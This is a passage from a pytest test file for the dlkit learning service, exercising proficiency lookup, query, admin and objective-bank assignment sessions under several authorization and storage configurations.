def test_get_proficiencies_by_parent_genus_type(self):
"""Tests get_proficiencies_by_parent_genus_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_parent_genus_type_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.Unimplemented):
# because the never_authz impl "tries harder" and runs the actual query...
# whereas above, the JSON implementation itself returns an empty list
self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_parent_genus_type(DEFAULT_GENUS_TYPE)
def test_get_proficiencies_by_record_type(self):
"""Tests get_proficiencies_by_record_type"""
# From test_templates/resource.py ResourceLookupSession.get_resources_by_record_type_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
assert objects.available() == 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies_by_record_type(DEFAULT_TYPE)
def test_get_proficiencies_on_date(self):
"""Tests get_proficiencies_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_on_date(True, True)
def test_get_proficiencies_by_genus_type_on_date(self):
"""Tests get_proficiencies_by_genus_type_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_on_date(True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_objective(self):
"""Tests get_proficiencies_for_objective"""
pass
def test_get_proficiencies_for_objective_on_date(self):
"""Tests get_proficiencies_for_objective_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_for_objective_on_date(True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_by_genus_type_for_objective(self):
"""Tests get_proficiencies_by_genus_type_for_objective"""
pass
def test_get_proficiencies_by_genus_type_for_objective_on_date(self):
"""Tests get_proficiencies_by_genus_type_for_objective_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_for_objective_on_date(True, True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_objectives(self):
"""Tests get_proficiencies_for_objectives"""
pass
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_resource(self):
"""Tests get_proficiencies_for_resource"""
pass
def test_get_proficiencies_for_resource_on_date(self):
"""Tests get_proficiencies_for_resource_on_date"""
# From test_templates/relationship.py::RelationshipLookupSession::get_relationships_for_source_on_date_template
if not is_never_authz(self.service_config):
end_date = DateTime.utcnow() + datetime.timedelta(days=5)
end_date = DateTime(**{
'year': end_date.year,
'month': end_date.month,
'day': end_date.day,
'hour': end_date.hour,
'minute': end_date.minute,
'second': end_date.second,
'microsecond': end_date.microsecond
})
# NOTE: this first argument will probably break in many of the other methods,
# since it's not clear they always use something like AGENT_ID
# i.e. in get_grade_entries_for_gradebook_column_on_date it needs to be
# a gradebookColumnId.
results = self.session.get_proficiencies_for_resource_on_date(AGENT_ID, DateTime.utcnow(), end_date)
assert isinstance(results, ABCObjects.ProficiencyList)
assert results.available() == 2
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_by_genus_type_for_resource(self):
"""Tests get_proficiencies_by_genus_type_for_resource"""
pass
def test_get_proficiencies_by_genus_type_for_resource_on_date(self):
"""Tests get_proficiencies_by_genus_type_for_resource_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_for_resource_on_date(True, True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_resources(self):
"""Tests get_proficiencies_for_resources"""
pass
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_for_objective_and_resource(self):
"""Tests get_proficiencies_for_objective_and_resource"""
pass
def test_get_proficiencies_for_objective_and_resource_on_date(self):
"""Tests get_proficiencies_for_objective_and_resource_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_for_objective_and_resource_on_date(True, True, True, True)
@pytest.mark.skip('unimplemented test')
def test_get_proficiencies_by_genus_type_for_objective_and_resource(self):
"""Tests get_proficiencies_by_genus_type_for_objective_and_resource"""
pass
def test_get_proficiencies_by_genus_type_for_objective_and_resource_on_date(self):
"""Tests get_proficiencies_by_genus_type_for_objective_and_resource_on_date"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_proficiencies_by_genus_type_for_objective_and_resource_on_date(True, True, True, True, True)
def test_get_proficiencies(self):
"""Tests get_proficiencies"""
# From test_templates/resource.py ResourceLookupSession.get_resources_template
from dlkit.abstract_osid.learning.objects import ProficiencyList
if self.svc_mgr.supports_proficiency_query():
objects = self.catalog.get_proficiencies()
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies()
assert isinstance(objects, ProficiencyList)
if not is_never_authz(self.service_config):
assert objects.available() > 0
else:
assert objects.available() == 0
else:
if not is_never_authz(self.service_config):
objects = self.catalog.get_proficiencies()
assert isinstance(objects, ProficiencyList)
self.catalog.use_federated_objective_bank_view()
objects = self.catalog.get_proficiencies()
assert objects.available() > 0
assert isinstance(objects, ProficiencyList)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiencies()
def test_get_proficiency_with_alias(self):
"""Tests get_proficiency with an aliased Id"""
if not is_never_authz(self.service_config):
# Because you can't create the alias with NEVER_AUTHZ
self.catalog.alias_proficiency(self.proficiency_ids[0], ALIAS_ID)
obj = self.catalog.get_proficiency(ALIAS_ID)
assert obj.get_id() == self.proficiency_ids[0]
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_query_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
@pytest.fixture(scope="function")
def proficiency_query_session_test_fixture(request):
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyQuerySession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
form = request.cls.catalog.get_objective_form_for_create([])
form.display_name = "Test LO"
objective = request.cls.catalog.create_objective(form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_proficiency_form_for_create(objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + color
create_form.description = (
'Test Proficiency for ProficiencyQuerySession tests, did I mention green')
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
else:
request.cls.catalog = request.cls.svc_mgr.get_proficiency_query_session(proxy=PROXY)
request.cls.session = request.cls.catalog
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_proficiencies():
catalog.delete_proficiency(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("proficiency_query_session_class_fixture", "proficiency_query_session_test_fixture")
class TestProficiencyQuerySession(object):
"""Tests for ProficiencyQuerySession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_search_proficiencies(self):
"""Tests can_search_proficiencies"""
# From test_templates/resource.py ResourceQuerySession::can_search_resources_template
assert isinstance(self.session.can_search_proficiencies(), bool)
def test_use_federated_objective_bank_view(self):
"""Tests use_federated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_federated_bin_view_template
self.catalog.use_federated_objective_bank_view()
def test_use_isolated_objective_bank_view(self):
"""Tests use_isolated_objective_bank_view"""
# From test_templates/resource.py ResourceLookupSession.use_isolated_bin_view_template
self.catalog.use_isolated_objective_bank_view()
def test_get_proficiency_query(self):
"""Tests get_proficiency_query"""
# From test_templates/resource.py ResourceQuerySession::get_resource_query_template
query = self.session.get_proficiency_query()
assert isinstance(query, ABCQueries.ProficiencyQuery)
def test_get_proficiencies_by_query(self):
"""Tests get_proficiencies_by_query"""
# From test_templates/resource.py ResourceQuerySession::get_resources_by_query_template
# Need to add some tests with string types
if not is_never_authz(self.service_config):
query = self.session.get_proficiency_query()
query.match_display_name('orange')
assert self.catalog.get_proficiencies_by_query(query).available() == 2
query.clear_display_name_terms()
query.match_display_name('blue', match=False)
assert self.session.get_proficiencies_by_query(query).available() == 3
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_proficiencies_by_query(FakeQuery())
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_admin_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('objective.objective%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
form = request.cls.catalog.get_objective_form_for_create([])
form.display_name = "Test LO"
request.cls.objective = request.cls.catalog.create_objective(form)
for color in ['Orange', 'Blue', 'Green', 'orange']:
create_form = request.cls.catalog.get_proficiency_form_for_create(request.cls.objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + color
create_form.description = (
'Test Proficiency for ProficiencyLookupSession tests, did I mention green')
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
request.cls.form = request.cls.catalog.get_proficiency_form_for_create(request.cls.objective.ident, AGENT_ID, [])
request.cls.form.display_name = 'new Proficiency'
request.cls.form.description = 'description of Proficiency'
request.cls.form.genus_type = NEW_TYPE
request.cls.osid_object = request.cls.catalog.create_proficiency(request.cls.form)
else:
request.cls.catalog = request.cls.svc_mgr.get_proficiency_admin_session(proxy=PROXY)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
for obj in catalog.get_proficiencies():
catalog.delete_proficiency(obj.ident)
for obj in catalog.get_objectives():
catalog.delete_objective(obj.ident)
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def proficiency_admin_session_test_fixture(request):
request.cls.session = request.cls.catalog
@pytest.mark.usefixtures("proficiency_admin_session_class_fixture", "proficiency_admin_session_test_fixture")
class TestProficiencyAdminSession(object):
"""Tests for ProficiencyAdminSession"""
def test_get_objective_bank_id(self):
"""Tests get_objective_bank_id"""
# From test_templates/resource.py ResourceLookupSession.get_bin_id_template
if not is_never_authz(self.service_config):
assert self.catalog.get_objective_bank_id() == self.catalog.ident
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# is this test really needed?
# From test_templates/resource.py::ResourceLookupSession::get_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.catalog.get_objective_bank(), ABCObjectiveBank)
def test_can_create_proficiencies(self):
"""Tests can_create_proficiencies"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resources_template
assert isinstance(self.catalog.can_create_proficiencies(), bool)
def test_can_create_proficiency_with_record_types(self):
"""Tests can_create_proficiency_with_record_types"""
# From test_templates/resource.py::ResourceAdminSession::can_create_resource_with_record_types_template
assert isinstance(self.catalog.can_create_proficiency_with_record_types(DEFAULT_TYPE), bool)
def test_get_proficiency_form_for_create(self):
"""Tests get_proficiency_form_for_create"""
if not is_never_authz(self.service_config):
form = self.catalog.get_proficiency_form_for_create(self.objective.ident, AGENT_ID, [])
assert isinstance(form, OsidForm)
assert not form.is_for_update()
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiency_form_for_create(self.fake_id, AGENT_ID, [])
def test_create_proficiency(self):
"""Tests create_proficiency"""
# From test_templates/resource.py::ResourceAdminSession::create_resource_template
from dlkit.abstract_osid.learning.objects import Proficiency
if not is_never_authz(self.service_config):
assert isinstance(self.osid_object, Proficiency)
assert self.osid_object.display_name.text == 'new Proficiency'
assert self.osid_object.description.text == 'description of Proficiency'
assert self.osid_object.genus_type == NEW_TYPE
with pytest.raises(errors.IllegalState):
self.catalog.create_proficiency(self.form)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_proficiency('I Will Break You!')
update_form = self.catalog.get_proficiency_form_for_update(self.osid_object.ident)
with pytest.raises(errors.InvalidArgument):
self.catalog.create_proficiency(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.create_proficiency('foo')
def test_can_update_proficiencies(self):
"""Tests can_update_proficiencies"""
# From test_templates/resource.py::ResourceAdminSession::can_update_resources_template
assert isinstance(self.catalog.can_update_proficiencies(), bool)
def test_get_proficiency_form_for_update(self):
"""Tests get_proficiency_form_for_update"""
# From test_templates/resource.py::ResourceAdminSession::get_resource_form_for_update_template
if not is_never_authz(self.service_config):
form = self.catalog.get_proficiency_form_for_update(self.osid_object.ident)
assert isinstance(form, OsidForm)
assert form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.catalog.get_proficiency_form_for_update(['This is Doomed!'])
with pytest.raises(errors.InvalidArgument):
self.catalog.get_proficiency_form_for_update(
Id(authority='Respect my Authoritay!',
namespace='learning.Proficiency',
identifier='1'))
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.get_proficiency_form_for_update(self.fake_id)
def test_update_proficiency(self):
"""Tests update_proficiency"""
# From test_templates/resource.py::ResourceAdminSession::update_resource_template
if not is_never_authz(self.service_config):
from dlkit.abstract_osid.learning.objects import Proficiency
form = self.catalog.get_proficiency_form_for_update(self.osid_object.ident)
form.display_name = 'new name'
form.description = 'new description'
form.set_genus_type(NEW_TYPE_2)
updated_object = self.catalog.update_proficiency(form)
assert isinstance(updated_object, Proficiency)
assert updated_object.ident == self.osid_object.ident
assert updated_object.display_name.text == 'new name'
assert updated_object.description.text == 'new description'
assert updated_object.genus_type == NEW_TYPE_2
with pytest.raises(errors.IllegalState):
self.catalog.update_proficiency(form)
with pytest.raises(errors.InvalidArgument):
self.catalog.update_proficiency('I Will Break You!')
with pytest.raises(errors.InvalidArgument):
self.catalog.update_proficiency(self.form)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.update_proficiency('foo')
def test_can_delete_proficiencies(self):
"""Tests can_delete_proficiencies"""
# From test_templates/resource.py::ResourceAdminSession::can_delete_resources_template
assert isinstance(self.catalog.can_delete_proficiencies(), bool)
def test_delete_proficiency(self):
"""Tests delete_proficiency"""
if not is_never_authz(self.service_config):
create_form = self.catalog.get_proficiency_form_for_create(self.objective.ident, AGENT_ID, [])
create_form.display_name = 'new Proficiency'
create_form.description = 'description of Proficiency'
create_form.genus_type = NEW_TYPE
osid_object = self.catalog.create_proficiency(create_form)
self.catalog.delete_proficiency(osid_object.ident)
with pytest.raises(errors.NotFound):
self.catalog.get_proficiency(osid_object.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.delete_proficiency(self.fake_id)
def test_delete_proficiencies(self):
"""Tests delete_proficiencies"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.session.delete_proficiencies()
def test_can_manage_proficiency_aliases(self):
"""Tests can_manage_proficiency_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.catalog.can_manage_proficiency_aliases(), bool)
def test_alias_proficiency(self):
"""Tests alias_proficiency"""
# From test_templates/resource.py::ResourceAdminSession::alias_resource_template
if not is_never_authz(self.service_config):
alias_id = Id(self.catalog.ident.namespace + '%3Amy-alias%40ODL.MIT.EDU')
self.catalog.alias_proficiency(self.osid_object.ident, alias_id)
aliased_object = self.catalog.get_proficiency(alias_id)
assert aliased_object.ident == self.osid_object.ident
else:
with pytest.raises(errors.PermissionDenied):
self.catalog.alias_proficiency(self.fake_id, self.fake_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def proficiency_objective_bank_assignment_session_class_fixture(request):
request.cls.service_config = request.param
request.cls.proficiency_list = list()
request.cls.proficiency_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ProficiencyObjectiveBankAssignmentSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank for Assignment'
create_form.description = 'Test ObjectiveBank for ProficiencyObjectiveBankAssignmentSession tests assignment'
request.cls.assigned_catalog = request.cls.svc_mgr.create_objective_bank(create_form)
create_form = request.cls.catalog.get_objective_form_for_create([])
create_form.display_name = 'Test Objective for Assignment'
create_form.description = 'Test Objective for ProficiencyObjectiveBankAssignmentSession tests assignment'
request.cls.objective = request.cls.catalog.create_objective(create_form)
for num in [0, 1, 2]:
create_form = request.cls.catalog.get_proficiency_form_for_create(request.cls.objective.ident, AGENT_ID, [])
create_form.display_name = 'Test Proficiency ' + str(num)
create_form.description = 'Test Proficiency for ProficiencyObjectiveBankAssignmentSession tests'
obj = request.cls.catalog.create_proficiency(create_form)
request.cls.proficiency_list.append(obj)
request.cls.proficiency_ids.append(obj.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for obj in request.cls.catalog.get_proficiencies():
request.cls.catalog.delete_proficiency(obj.ident)
request.cls.catalog.delete_objective(request.cls.objective.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.assigned_catalog.ident)
request.cls.svc_mgr.delete_objective_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def proficiency_objective_bank_assignment_session_test_fixture(request):
# From test_templates/resource.py::ResourceBinAssignmentSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("proficiency_objective_bank_assignment_session_class_fixture", "proficiency_objective_bank_assignment_session_test_fixture")
class TestProficiencyObjectiveBankAssignmentSession(object):
"""Tests for ProficiencyObjectiveBankAssignmentSession"""
def test_can_assign_proficiencies(self):
"""Tests can_assign_proficiencies"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_template
result = self.session.can_assign_proficiencies()
assert isinstance(result, bool)
def test_can_assign_proficiencies_to_objective_bank(self):
"""Tests can_assign_proficiencies_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::can_assign_resources_to_bin_template
result = self.session.can_assign_proficiencies_to_objective_bank(self.assigned_catalog.ident)
assert isinstance(result, bool)
def test_get_assignable_objective_bank_ids(self):
"""Tests get_assignable_objective_bank_ids"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy).
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids(self.catalog.ident)
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids(self.fake_id)
def test_get_assignable_objective_bank_ids_for_proficiency(self):
"""Tests get_assignable_objective_bank_ids_for_proficiency"""
# From test_templates/resource.py::ResourceBinAssignmentSession::get_assignable_bin_ids_for_resource_template
# Note that our implementation just returns all catalogIds, which does not follow
# the OSID spec (should return only the catalogIds below the given one in the hierarchy).
if not is_never_authz(self.service_config):
results = self.session.get_assignable_objective_bank_ids_for_proficiency(self.catalog.ident, self.proficiency_ids[0])
assert isinstance(results, IdList)
# Because we're not deleting all banks from all tests, we might
# have some crufty banks here...but there should be at least 2.
assert results.available() >= 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.get_assignable_objective_bank_ids_for_proficiency(self.fake_id, self.fake_id)
def test_assign_proficiency_to_objective_bank(self):
"""Tests assign_proficiency_to_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::assign_resource_to_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 0
self.session.assign_proficiency_to_objective_bank(self.proficiency_ids[1], self.assigned_catalog.ident)
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 1
self.session.unassign_proficiency_from_objective_bank(
self.proficiency_ids[1],
self.assigned_catalog.ident)
else:
with pytest.raises(errors.PermissionDenied):
self.session.assign_proficiency_to_objective_bank(self.fake_id, self.fake_id)
def test_unassign_proficiency_from_objective_bank(self):
"""Tests unassign_proficiency_from_objective_bank"""
# From test_templates/resource.py::ResourceBinAssignmentSession::unassign_resource_from_bin_template
if not is_never_authz(self.service_config):
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 0
self.session.assign_proficiency_to_objective_bank(
self.proficiency_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 1
self.session.unassign_proficiency_from_objective_bank(
self.proficiency_ids[1],
self.assigned_catalog.ident)
results = self.assigned_catalog.get_proficiencies()
assert results.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.unassign_proficiency_from_objective_bank(self.fake_id, self.fake_id)
def test_reassign_proficiency_to_objective_bank(self):
"""Tests reassign_proficiency_to_objective_bank"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.reassign_proficiency_to_objective_bank(True, True, True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_lookup_session_class_fixture(request):
# From test_templates/resource.py::BinLookupSession::init_template
request.cls.service_config = request.param
request.cls.catalogs = list()
request.cls.catalog_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
for num in [0, 1]:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank ' + str(num)
create_form.description = 'Test ObjectiveBank for learning proxy manager tests'
catalog = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.catalogs.append(catalog)
request.cls.catalog_ids.append(catalog.ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_bank_lookup_session_test_fixture(request):
# From test_templates/resource.py::BinLookupSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_bank_lookup_session_class_fixture", "objective_bank_lookup_session_test_fixture")
class TestObjectiveBankLookupSession(object):
"""Tests for ObjectiveBankLookupSession"""
def test_can_lookup_objective_banks(self):
"""Tests can_lookup_objective_banks"""
# From test_templates/resource.py::BinLookupSession::can_lookup_bins_template
assert isinstance(self.session.can_lookup_objective_banks(), bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_objective_bank(self):
"""Tests get_objective_bank"""
# From test_templates/resource.py::BinLookupSession::get_bin_template
if not is_never_authz(self.service_config):
catalog = self.svc_mgr.get_objective_bank(self.catalogs[0].ident)
assert catalog.ident == self.catalogs[0].ident
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank(self.fake_id)
def test_get_objective_banks_by_ids(self):
"""Tests get_objective_banks_by_ids"""
# From test_templates/resource.py::BinLookupSession::get_bins_by_ids_template
if not is_never_authz(self.service_config):
catalogs = self.svc_mgr.get_objective_banks_by_ids(self.catalog_ids)
assert catalogs.available() == 2
assert isinstance(catalogs, ABCObjects.ObjectiveBankList)
catalog_id_strs = [str(cat_id) for cat_id in self.catalog_ids]
for index, catalog in enumerate(catalogs):
assert str(catalog.ident) in catalog_id_strs
catalog_id_strs.remove(str(catalog.ident))
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_ids([self.fake_id])
def test_get_objective_banks_by_genus_type(self):
"""Tests get_objective_banks_by_genus_type"""
# From test_templates/resource.py::BinLookupSession::get_bins_by_genus_type_template
if not is_never_authz(self.service_config):
catalogs = self.svc_mgr.get_objective_banks_by_genus_type(DEFAULT_GENUS_TYPE)
assert catalogs.available() > 0
assert isinstance(catalogs, ABCObjects.ObjectiveBankList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks_by_genus_type(DEFAULT_GENUS_TYPE)
def test_get_objective_banks_by_parent_genus_type(self):
"""Tests get_objective_banks_by_parent_genus_type"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_banks_by_parent_genus_type(True)
def test_get_objective_banks_by_record_type(self):
"""Tests get_objective_banks_by_record_type"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_banks_by_record_type(True)
def test_get_objective_banks_by_provider(self):
"""Tests get_objective_banks_by_provider"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.session.get_objective_banks_by_provider(True)
def test_get_objective_banks(self):
"""Tests get_objective_banks"""
# From test_templates/resource.py::BinLookupSession::get_bins_template
if not is_never_authz(self.service_config):
